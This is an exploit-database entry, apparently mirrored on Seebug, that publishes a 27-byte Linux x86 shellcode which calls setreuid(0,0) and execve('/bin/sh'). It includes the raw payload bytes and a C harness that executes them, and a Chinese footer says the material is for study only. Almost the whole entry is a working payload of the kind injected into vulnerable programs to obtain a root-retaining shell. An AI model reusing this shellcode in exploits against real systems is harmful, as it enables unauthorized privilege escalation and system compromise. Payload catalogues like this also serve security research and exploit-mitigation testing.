# Title: 27 bytes setreuid(0, 0) & execve("/bin/sh") shellcode # EDB-ID: 12357 # CVE-ID: () # OSVDB-ID: () # Author: Magnefikko # Published: 2010-04-23 # Verified: no # Download Exploit Code # Download N/A view source print? #include <stdio.h> #include <string.h> /* ?by Magnefikko ?22.04.2010 ?magnefikko@gmail.com ?promhyl.oz.pl ?Subgroup: #PRekambr ?Name: 27 bytes setreuid(0, 0) & execve("/bin/sh") shellcode ?Platform: Linux x86 ? ?setreuid(0, 0); ?execve("/bin/sh", 0, 0);? ?gcc -Wl,-z,execstack filename.c ?shellcode: \x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80 */ int main(){ ?char shell[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80"; ?printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.oz.pl\n\nstrlen(shell) = %d\n", strlen(shell)); ?(*(void (*)()) shell)(); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论